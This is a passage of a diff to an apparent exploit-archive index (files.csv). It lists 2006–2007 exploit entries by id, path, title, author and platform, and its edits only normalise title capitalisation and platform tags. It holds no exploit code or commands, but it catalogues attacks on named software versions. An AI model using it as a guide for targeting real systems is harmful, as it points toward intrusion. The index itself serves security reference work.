File Inclusion",2006-12-22,mdx,php,webapps,0 +2980,platforms/php/webapps/2980.txt,"EternalMart GuestBook 1.10 - (admin/auth.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0 2981,platforms/php/webapps/2981.php,"open newsletter 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps,0 2982,platforms/php/webapps/2982.txt,"3editor CMS 0.42 - 'index.php' Local File Inclusion",2006-12-22,3l3ctric-Cracker,php,webapps,0 2983,platforms/php/webapps/2983.txt,"b2 Blog 0.5 - (b2verifauth.php) Remote File Inclusion",2006-12-23,mdx,php,webapps,0 @@ -2723,11 +2723,11 @@ id,file,description,date,author,platform,type,port 3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons 2006.01 - (key) SQL Injection",2006-12-30,ajann,asp,webapps,0 3049,platforms/php/webapps/3049.php,"IMGallery 2.5 - Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 -3051,platforms/php/webapps/3051.txt,"WordPress Enigma 2 Bridge Plugin - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 +3051,platforms/php/webapps/3051.txt,"Wordpress Enigma 2 Bridge Plugin - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 3052,platforms/windows/dos/3052.c,"Microsoft Windows - NtRaiseHardError Csrss.exe-winsrv.dll Double Free",2006-12-31,"Ruben Santamarta ",windows,dos,0 3053,platforms/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 3054,platforms/php/webapps/3054.txt,"P-News 1.16 / 1.17 - (user.dat) Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 -3055,platforms/windows/remote/3055.html,"WinZIP 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0 +3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0 3056,platforms/windows/dos/3056.pl,"Formbankserver 1.9 - (Name) Remote Denial of Service",2006-12-31,Bl0od3r,windows,dos,0 3057,platforms/php/webapps/3057.php,"MDForum 2.0.1 - (PNSVlang) Remote Code Execution Exploit",2006-12-31,Kacper,php,webapps,0 3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader - (ActiveX Control) Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0 @@ -2742,7 +2742,7 @@ id,file,description,date,author,platform,type,port 3067,platforms/windows/remote/3067.txt,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (Perl)",2007-01-01,"Jacopo Cervini",windows,remote,25 3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 3069,platforms/osx/dos/3069.pl,"VLC Media Player 0.8.6 (PPC) - (udp://) Format String Exploit (PoC)",2007-01-02,MoAB,osx,dos,0 -3070,platforms/osx/local/3070.pl,"VLC Media Player 0.8.6 - (udp://) Format String Exploit (x86)",2007-01-02,MoAB,osx,local,0 +3070,platforms/osx/local/3070.pl,"VLC Media Player 0.8.6 (x86) - (udp://) Format String Exploit",2007-01-02,MoAB,osx,local,0 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation",2007-01-03,erasmus,windows,local,0 3072,platforms/windows/remote/3072.py,"Apple Quicktime - (rtsp URL Handler) Buffer Overflow (Windows 2000)",2007-01-03,"Winny Thomas",windows,remote,0 3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0 @@ -2759,15 +2759,15 @@ id,file,description,date,author,platform,type,port 3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - (acroreader) Cross-Site Scripting",2007-01-05,"Stefano Di Paola",windows,remote,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0 3086,platforms/windows/remote/3086.py,"CA BrightStor ARCserve - (tapeeng.exe) Remote Buffer Overflow",2007-01-05,"Winny Thomas",windows,remote,6502 -3087,platforms/osx/local/3087.rb,"Mac OS X 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,osx,local,0 -3088,platforms/osx/local/3088.rb,"Mac OS X 10.4.8 - DiskManagement BOM (cron) Privilege Escalation",2007-01-05,MoAB,osx,local,0 +3087,platforms/osx/local/3087.rb,"Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,osx,local,0 +3088,platforms/osx/local/3088.rb,"Mac OSX 10.4.8 - DiskManagement BOM (cron) Privilege Escalation",2007-01-05,MoAB,osx,local,0 3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion",2007-01-06,"Mehmet Ince",php,webapps,0 3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion Exploit",2007-01-07,Codebreak,php,webapps,0 3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow (Metasploit)",2007-01-07,"Jacopo Cervini",windows,remote,80 3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - (AMG_serverpath) Remote File Inclusion",2007-01-07,beks,php,webapps,0 3094,platforms/bsd/local/3094.c,"OpenBSD 3.x - 4.0 vga_ioctl() Privilege Escalation",2007-01-07,"Critical Security",bsd,local,0 -3095,platforms/php/webapps/3095.py,"WordPress 2.0.5 - Trackback UTF-7 SQL Injection",2007-01-07,"Stefan Esser",php,webapps,0 +3095,platforms/php/webapps/3095.py,"Wordpress 2.0.5 - Trackback UTF-7 SQL Injection",2007-01-07,"Stefan Esser",php,webapps,0 3096,platforms/php/webapps/3096.txt,"AllMyLinks 0.5.0 - 'index.php' Remote File Inclusion",2007-01-07,GoLd_M,php,webapps,0 3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 - 'index.php' Remote File Inclusion",2007-01-07,bd0rk,php,webapps,0 3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 - Javascript alert() Remote Format String PoC",2007-01-07,MoAB,osx,dos,0 @@ -2775,14 +2775,14 @@ id,file,description,date,author,platform,type,port 3100,platforms/php/webapps/3100.txt,"Magic Photo Storage Website - _config[site_path] File Include",2007-01-08,k1tk4t,php,webapps,0 3101,platforms/multiple/dos/3101.py,"Opera 9.10 - .JPG Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0 3102,platforms/osx/local/3102.rb,"Application Enhancer (APE) 2.0.2 - Privilege Escalation",2007-01-08,MoAB,osx,local,0 -3103,platforms/php/webapps/3103.php,"@lex Guestbook 4.0.2 - Remote Command Execution Exploit",2007-01-08,DarkFig,php,webapps,0 +3103,platforms/php/webapps/3103.php,"@lex GuestBook 4.0.2 - Remote Command Execution Exploit",2007-01-08,DarkFig,php,webapps,0 3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 - (INC) Multiple Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 3105,platforms/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate 2.1 - SQL Injection",2007-01-09,ajann,asp,webapps,0 3106,platforms/php/webapps/3106.txt,"uniForum 4 - (wbsearch.aspx) SQL Injection",2007-01-09,ajann,php,webapps,0 3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server 1.01 - (LIST) Remote Buffer Overflow Exploit (Metasploit)",2007-01-09,"Jacopo Cervini",windows,remote,21 3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion Exploit",2007-01-09,DeltahackingTEAM,php,webapps,0 -3109,platforms/php/webapps/3109.php,"WordPress 2.0.6 - wp-trackback.php SQL Injection",2007-01-10,rgod,php,webapps,0 -3110,platforms/osx/dos/3110.rb,"Mac OS X 10.4.8 - Apple Finder DMG Volume Name Memory Corruption PoC",2007-01-09,MoAB,osx,dos,0 +3109,platforms/php/webapps/3109.php,"Wordpress 2.0.6 - wp-trackback.php SQL Injection",2007-01-10,rgod,php,webapps,0 +3110,platforms/osx/dos/3110.rb,"Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption PoC",2007-01-09,MoAB,osx,dos,0 3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (WMF) CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - (fieldValidation.php) Remote File Inclusion",2007-01-10,irvian,php,webapps,0 @@ -2801,7 +2801,7 @@ id,file,description,date,author,platform,type,port 3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - SITE ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0 3127,platforms/windows/dos/3127.c,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow PoC",2007-01-14,Marsu,windows,dos,0 3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - (USER) Remote Buffer Overflow PoC",2007-01-14,Marsu,windows,dos,0 -3130,platforms/osx/dos/3130.c,"Mac OS X 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow PoC",2007-01-14,MoAB,osx,dos,0 +3130,platforms/osx/dos/3130.c,"Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow PoC",2007-01-14,MoAB,osx,dos,0 3131,platforms/windows/local/3131.c,"Kaspersky Antivirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0 3132,platforms/windows/remote/3132.pl,"TFTPDWIN 0.4.2 - Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,69 3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,143 @@ -2821,7 +2821,7 @@ id,file,description,date,author,platform,type,port 3148,platforms/windows/remote/3148.pl,"Microsoft Internet Explorer - VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0 3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 - (.CNT) Buffer Overflow",2007-01-17,porkythepig,windows,local,0 3150,platforms/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - (lang/index.php) Remote File Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 -3151,platforms/osx/dos/3151.rb,"Mac OS X 10.4.8 - SLP Daemon Service Registration Buffer Overflow PoC",2007-01-18,MoAB,osx,dos,0 +3151,platforms/osx/dos/3151.rb,"Mac OSX 10.4.8 - SLP Daemon Service Registration Buffer Overflow PoC",2007-01-18,MoAB,osx,dos,0 3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Inclusion",2007-01-18,GoLd_M,php,webapps,0 3153,platforms/php/webapps/3153.php,"phpBP RC3 - (2.204) (SQL Injection / cmd) Remote Code Execution Exploit",2007-01-18,Kacper,php,webapps,0 3154,platforms/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,linux,local,0 @@ -2837,13 +2837,13 @@ id,file,description,date,author,platform,type,port 3164,platforms/php/webapps/3164.pl,"phpIndexPage 1.0.1 - (config.php) Remote File Inclusion Exploit",2007-01-20,DeltahackingTEAM,php,webapps,0 3165,platforms/php/webapps/3165.txt,"MySpeach 2.1b - (up.php) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3166,platforms/osx/dos/3166.html,"Apple iChat 3.1.6 441 - aim:// URL Handler Format String Exploit (PoC)",2007-01-21,MoAB,osx,dos,0 -3167,platforms/osx/dos/3167.c,"Mac OS X 10.4.x Kernel - shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 +3167,platforms/osx/dos/3167.c,"Mac OSX 10.4.x Kernel - shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 3168,platforms/windows/remote/3168.java,"Sun Microsystems Java - .GIF File Parsing Memory Corruption Exploit",2007-01-21,luoluo,windows,remote,0 3169,platforms/php/webapps/3169.txt,"WebChat 0.77 - (defines.php WEBCHATPATH) Remote File Inclusion",2007-01-21,v1per-haCker,php,webapps,0 3170,platforms/windows/remote/3170.pm,"3Com TFTP Service 2.0.1 - Remote Buffer Overflow (Metasploit)",2007-01-21,Enseirb,windows,remote,69 3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - (index.php gen) Remote File Inclusion Exploit",2007-01-21,DeltahackingTEAM,php,webapps,0 3172,platforms/php/webapps/3172.php,"webSPELL 4.01.02 - (gallery.php) Blind SQL Injection",2007-01-21,r00t,php,webapps,0 -3173,platforms/osx/local/3173.rb,"Mac OS X 10.4.8 - System Preferences Privilege Escalation",2007-01-21,MoAB,osx,local,0 +3173,platforms/osx/local/3173.rb,"Mac OSX 10.4.8 - System Preferences Privilege Escalation",2007-01-21,MoAB,osx,local,0 3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 - (top.php maindir) Remote File Inclusion",2007-01-21,y3dips,php,webapps,0 3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 - functions.visohotlink.php Remote File Inclusion Exploit",2007-01-22,bd0rk,php,webapps,0 3176,platforms/windows/local/3176.cpp,"Microsoft Visual C++ - (.RC Resource Files) Local Buffer Overflow",2007-01-22,porkythepig,windows,local,0 @@ -2851,7 +2851,7 @@ id,file,description,date,author,platform,type,port 3178,platforms/multiple/local/3178.txt,"Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3179,platforms/multiple/local/3179.txt,"Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - (poll_frame.php poll_id) Remote Code Execution Exploit",2007-01-23,r0ut3r,php,webapps,0 -3181,platforms/osx/local/3181.rb,"Mac OS X 10.4.8 - (UserNotificationCenter) Privilege Escalation",2007-01-23,MoAB,osx,local,0 +3181,platforms/osx/local/3181.rb,"Mac OSX 10.4.8 - (UserNotificationCenter) Privilege Escalation",2007-01-23,MoAB,osx,local,0 3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) Denial of Service",2007-01-23,shinnai,windows,dos,0 3183,platforms/php/webapps/3183.txt,"BBClone 0.31 - (selectlang.php) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 3184,platforms/php/webapps/3184.txt,"phpXD 0.3 - (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 @@ -2887,7 +2887,7 @@ id,file,description,date,author,platform,type,port 3216,platforms/php/webapps/3216.txt,"xNews 1.3 - (xNews.php) SQL Injection",2007-01-28,ajann,php,webapps,0 3217,platforms/php/webapps/3217.txt,"PhP Generic library & framework - (include_path) Remote File Inclusion",2007-01-28,"Mehmet Ince",php,webapps,0 3218,platforms/windows/remote/3218.pl,"CA BrightStor ARCserve - (msgeng.exe) Remote Heap Overflow (2)",2007-01-28,"Jacopo Cervini",windows,remote,6503 -3219,platforms/osx/local/3219.rb,"Mac OS X 10.4.8 (8L2127) - crashdump Privilege Escalation",2007-01-29,MoAB,osx,local,0 +3219,platforms/osx/local/3219.rb,"Mac OSX 10.4.8 (8L2127) - crashdump Privilege Escalation",2007-01-29,MoAB,osx,local,0 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0 3221,platforms/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 3222,platforms/php/webapps/3222.txt,"Webfwlog 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0 @@ -2926,7 +2926,7 @@ id,file,description,date,author,platform,type,port 3255,platforms/php/webapps/3255.php,"F3Site 2.1 - Remote Code Execution Exploit",2007-02-02,Kacper,php,webapps,0 3256,platforms/php/webapps/3256.txt,"dB Masters Curium CMS 1.03 - (c_id) SQL Injection",2007-02-02,ajann,php,webapps,0 3257,platforms/osx/dos/3257.php,"Chicken of the VNC 2.0 - (NULL-pointer) Remote Denial of Service",2007-02-02,poplix,osx,dos,0 -3258,platforms/php/webapps/3258.txt,"phpBB ezBoard converter 0.2 - (ezconvert_dir) Remote File Inclusion Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 +3258,platforms/php/webapps/3258.txt,"phpBB ezBoard Converter 0.2 - (ezconvert_dir) Remote File Inclusion Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 3259,platforms/php/webapps/3259.pl,"phpBB++ Build 100 - (phpbb_root_path) Remote File Inclusion Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution Exploit",2007-02-03,xCuter,windows,local,0 3261,platforms/php/webapps/3261.txt,"Photo Galerie Standard 1.1 - (view.php) SQL Injection",2007-02-03,ajann,php,webapps,0 @@ -2942,7 +2942,7 @@ id,file,description,date,author,platform,type,port 3271,platforms/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution Exploit",2007-02-05,Kacper,php,webapps,0 3272,platforms/windows/dos/3272.html,"Microsoft Internet Explorer 6 - (mshtml.dll) Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0 3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0 -3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 - User-Defined Function (UDF) Command Execution Exploit (Windows)",2007-02-06,"Marco Ivaldi",windows,remote,3306 +3274,platforms/windows/remote/3274.txt,"MySQL 4.x/5.0 (Windows) - User-Defined Function (UDF) Command Execution Exploit",2007-02-06,"Marco Ivaldi",windows,remote,3306 3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 - (inhalt.php) Remote File Inclusion",2007-02-06,ajann,php,webapps,0 3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow Denial of Service",2007-02-06,Marsu,windows,dos,0 3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 - Remote Heap Overflow Denial of Service",2007-02-06,Marsu,windows,dos,0 @@ -2961,17 +2961,17 @@ id,file,description,date,author,platform,type,port 3290,platforms/linux/dos/3290.c,"Axigen 2.0.0b1 - Remote Denial of Service (2)",2007-02-08,mu-b,linux,dos,0 3291,platforms/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure Exploit",2007-02-08,Nicob,windows,remote,0 3292,platforms/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin - Remote File Inclusion",2007-02-11,y3dips,php,webapps,0 -3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 - in.telnetd Remote Authentication Bypass Exploit",2007-02-11,kingcope,solaris,remote,23 +3293,platforms/solaris/remote/3293.sh,"SunOS 5.10/5.11 - in.TelnetD Remote Authentication Bypass Exploit",2007-02-11,kingcope,solaris,remote,23 3294,platforms/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Arbitrary File Disclosure",2007-02-11,"Sebastian Wolfgarten",hardware,remote,80 3295,platforms/asp/webapps/3295.txt,"Philboard 1.14 - (philboard_forum.asp) SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 3296,platforms/windows/remote/3296.c,"uTorrent 1.6 build 474 - (announce) Key Remote Heap Overflow",2007-02-12,defsec,windows,remote,0 3297,platforms/php/webapps/3297.htm,"AT Contenator 1.0 - (Root_To_Script) Remote File Inclusion Exploit",2007-02-13,ajann,php,webapps,0 3298,platforms/php/webapps/3298.pl,"Xaran CMS 2.0 - (xarancms_haupt.php) SQL Injection",2007-02-13,ajann,php,webapps,0 -3299,platforms/php/webapps/3299.pl,"phpCC 4.2 beta - (nickpage.php npid) SQL Injection",2007-02-13,ajann,php,webapps,0 +3299,platforms/php/webapps/3299.pl,"phpCC 4.2 Beta - (nickpage.php npid) SQL Injection",2007-02-13,ajann,php,webapps,0 3300,platforms/php/webapps/3300.pl,"Advanced Poll 2.0.5-dev - Remote Code Execution Exploit",2007-02-13,diwou,php,webapps,0 3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 - (pollmentorres.asp id) SQL Injection",2007-02-13,SaO,asp,webapps,0 3302,platforms/windows/remote/3302.sh,"Lotus Domino R6 Webmail - Remote Password Hash Dumper Exploit",2007-02-13,"Marco Ivaldi",windows,remote,80 -3303,platforms/multiple/remote/3303.sh,"Portable OpenSSH 3.6.1p-PAM / 4.1-SUSE - Timing Attack Exploit",2007-02-13,"Marco Ivaldi",multiple,remote,0 +3303,platforms/multiple/remote/3303.sh,"Portable OpenSSH 3.6.1p-PAM / 4.1-SuSE - Timing Attack Exploit",2007-02-13,"Marco Ivaldi",multiple,remote,0 3304,platforms/windows/dos/3304.py,"MiniWebsvr 0.0.6 - Remote Resource Consumption Denial of Service",2007-02-13,shinnai,windows,dos,0 3305,platforms/php/webapps/3305.txt,"nabopoll 1.2 - Remote Unprotected Admin Section",2007-02-13,sn0oPy,php,webapps,0 3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service",2007-02-14,mu-b,windows,dos,0 @@ -3115,7 +3115,7 @@ id,file,description,date,author,platform,type,port 3448,platforms/php/webapps/3448.txt,"work system e-commerce 3.0.5 - Remote File Inclusion",2007-03-10,"Rodrigo Duarte",php,webapps,0 3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - (index.php ID) SQL Injection",2007-03-10,WiLdBoY,php,webapps,0 3450,platforms/php/webapps/3450.php,"NukeSentinel 2.5.06 - SQL Injection",2007-03-10,DarkFig,php,webapps,0 -3451,platforms/windows/local/3451.c,"Oracle 10g - (PROCESS_DUP_HANDLE) Local Privilege Elevation (Win32)",2007-03-10,"Cesar Cerrudo",windows,local,0 +3451,platforms/windows/local/3451.c,"Oracle 10g (Windows/x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",windows,local,0 3452,platforms/multiple/remote/3452.php,"PHP 5.2.0 - ext/filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0 3453,platforms/windows/dos/3453.py,"Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos,0 3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 - (phgdir) Remote File Inclusion Exploit",2007-03-11,bd0rk,php,webapps,0 @@ -3124,14 +3124,14 @@ id,file,description,date,author,platform,type,port 3457,platforms/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,php,webapps,0 3458,platforms/php/webapps/3458.txt,"AssetMan 2.4a - (download_pdf.php) Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0 3459,platforms/php/webapps/3459.txt,"cPanel 10.9.x - (fantastico) Local File Inclusion",2007-03-11,"cyb3rt & 020",php,webapps,0 -3460,platforms/osx/local/3460.php,"PHP 5.2.0 - ext/filter Space Trimming Buffer Underflow Exploit (MacOSX)",2007-03-12,"Stefan Esser",osx,local,0 +3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OSX) - ext/filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0 3461,platforms/windows/dos/3461.pl,"TFTP Server 1.3 - Remote Buffer Overflow Denial of Service",2007-03-12,"Umesh Wanve",windows,dos,0 3462,platforms/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow Exploit (1)",2007-03-12,Marsu,windows,remote,0 3463,platforms/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow Exploit (2)",2007-03-12,Marsu,windows,remote,0 3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode Buffer Overflow Exploit",2007-03-12,Marsu,windows,dos,0 3465,platforms/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps,0 3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - (default.asp layout) SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0 -3467,platforms/php/webapps/3467.txt,"GestArt beta 1 - (aide.php aide) Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 +3467,platforms/php/webapps/3467.txt,"GestArt Beta 1 - (aide.php aide) Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 3468,platforms/php/webapps/3468.txt,"MySQL Commander 2.7 - (home) Remote File Inclusion",2007-03-13,K-159,php,webapps,0 3469,platforms/asp/webapps/3469.txt,"X-ice News System 1.0 - (devami.asp id) SQL Injection",2007-03-13,CyberGhost,asp,webapps,0 3470,platforms/asp/webapps/3470.htm,"JGBBS 3.0beta1 - (search.asp author) SQL Injection",2007-03-13,WiLdBoY,asp,webapps,0 @@ -3139,7 +3139,7 @@ id,file,description,date,author,platform,type,port 3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - (root_path) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3474,platforms/windows/remote/3474.py,"WarFTP 1.65 - (USER) Remote Buffer Overflow (Windows 2000 SP4)",2007-03-14,"Winny Thomas",windows,remote,21 -3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 - Local File Inclusion (Win32)",2007-03-14,Bl0od3r,php,webapps,0 +3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows/x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0 3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) SQL Injection",2007-03-14,WiLdBoY,php,webapps,0 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - (postpost.php) Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0 3479,platforms/linux/local/3479.php,"PHP 5.2.1 - session_regenerate_id() Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 @@ -3152,7 +3152,7 @@ id,file,description,date,author,platform,type,port 3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion Exploit",2007-03-15,Crackers_Child,php,webapps,0 3488,platforms/windows/local/3488.php,"PHP 4.4.6 - ibase_connect() Local Buffer Overflow",2007-03-15,rgod,windows,local,0 -3489,platforms/php/webapps/3489.txt,"creative guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 +3489,platforms/php/webapps/3489.txt,"creative GuestBook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 3490,platforms/php/webapps/3490.txt,"wbblog - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0 3491,platforms/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution Exploit (PoC)",2007-03-15,"Core Security",bsd,remote,0 3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 - (includedir) Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0 @@ -3180,16 +3180,16 @@ id,file,description,date,author,platform,type,port 3514,platforms/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash Exploit",2007-03-18,DATA_SNIPER,windows,dos,0 3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics 2.0 - (index.php recid) SQL Injection",2007-03-19,ajann,php,webapps,0 3516,platforms/php/webapps/3516.php,"MetaForum 0.513 Beta - Remote File Upload Exploit",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0 -3517,platforms/osx/local/3517.php,"PHP 5.2.0 - header() Space Trimming Buffer Underflow Exploit (MacOSX)",2007-03-19,"Stefan Esser",osx,local,0 +3517,platforms/osx/local/3517.php,"PHP 5.2.0 (OSX) - header() Space Trimming Buffer Underflow Exploit",2007-03-19,"Stefan Esser",osx,local,0 3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion Exploit",2007-03-19,GoLd_M,php,webapps,0 3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod 2.0.21 build 238a - SQL Injection",2007-03-19,"Mehmet Ince",php,webapps,0 3520,platforms/asp/webapps/3520.txt,"NetVios Portal - (page.asp) SQL Injection",2007-03-19,parad0x,asp,webapps,0 -3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (Windows)",2007-03-19,bd0rk,php,webapps,0 -3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit 